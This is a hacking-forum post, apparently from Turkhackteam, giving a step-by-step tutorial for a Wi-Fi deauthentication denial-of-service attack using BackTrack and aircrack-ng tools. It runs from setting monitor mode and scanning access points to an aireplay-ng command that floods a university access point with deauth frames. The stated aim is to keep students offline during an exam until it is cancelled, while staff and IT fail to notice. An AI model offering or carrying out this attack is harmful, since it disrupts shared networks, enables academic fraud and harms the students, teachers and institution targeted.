Performing a Denial of Service (DoS) Attack on a Wireless Access Point

iscorpix

Kıdemli Üye
10 Eyl 2012
4,378
12
Hi.

Step 1 Open a Terminal


Now that we're positioned within range of the wireless access point for the exam, let's fire up BackTrack and open a terminal. Let's make certain our wireless adapter is recognized in BackTrack and functioning.

Kod:
iwconfig

hack-wi-fi-performing-denial-service-dos-attack-wireless-access-point.w1456.jpg


Step 2 Put the Wireless Adapter in Monitor Mode

Our next step is to put our wireless adapter in monitor mode with airmon-ng.

Kod:
airmon-ng start wlan0

hack-wi-fi-performing-denial-service-dos-attack-wireless-access-point.w1456.jpg


Step 3 Monitor the Available APs with Airodump-Ng

Now we want to take a look at all the access points in range by using airodump-ng.

Kod:
airodump-ng mon0

hack-wi-fi-performing-denial-service-dos-attack-wireless-access-point.w1456.jpg


As we can see, the access point for Concord University is the third access point displayed. Note its BSSID (this is its globally unique identifier based on its MAC address) and copy it.

Step 4 Connect to the Access Point

Now we need to connect to the AP with our computer.

hack-wi-fi-performing-denial-service-dos-attack-wireless-access-point.w1456.jpg


We can see the connection at the bottom of screen. There we can see the access point's BSSID on the far left bottom and the MAC address of our client following it. We need both of these bits of information for our next step in this hack.

Step 5 Broadcast Deauthenticate Users on the AP

Now we're ready to deauthenticate (bump off) all the users from the AP. We need to send thousands of deauthenticate frames to keep any one from reconnecting to the AP. We can do this by typing the following into another terminal.

aireplay-ng --deauth 1000 -a 00:09:5B:6F:64:1E -h 44:6D:57:C8:58:A0 mon0

hack-wi-fi-performing-denial-service-dos-attack-wireless-access-point.w1456.jpg


Kod:
00:09:5B:6F:64:1E is the BSSID of the AP.
44:6D:57:C8:58:A0 is the MAC address of our computer.
1000 is the number of deauthentication frames to send to the AP.

As the students attempt to connect to the AP to take the exam, they will be unable to connect, or as soon as they do, they'll be disconnected. It's unlikely that the teacher or professor will have any idea what's happening, and for that matter, neither will the school IT director.

Step 6 Success!

We need to keep these deauthentication frames going toward the AP until the teacher or professor finally gives up and reschedules the exam.

Now, our best buddy has a few days until the rescheduled exam to cram and pass. Thanks to BackTrack and a bit of hacking skill, we have saved our buddy from exam Armageddon!
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.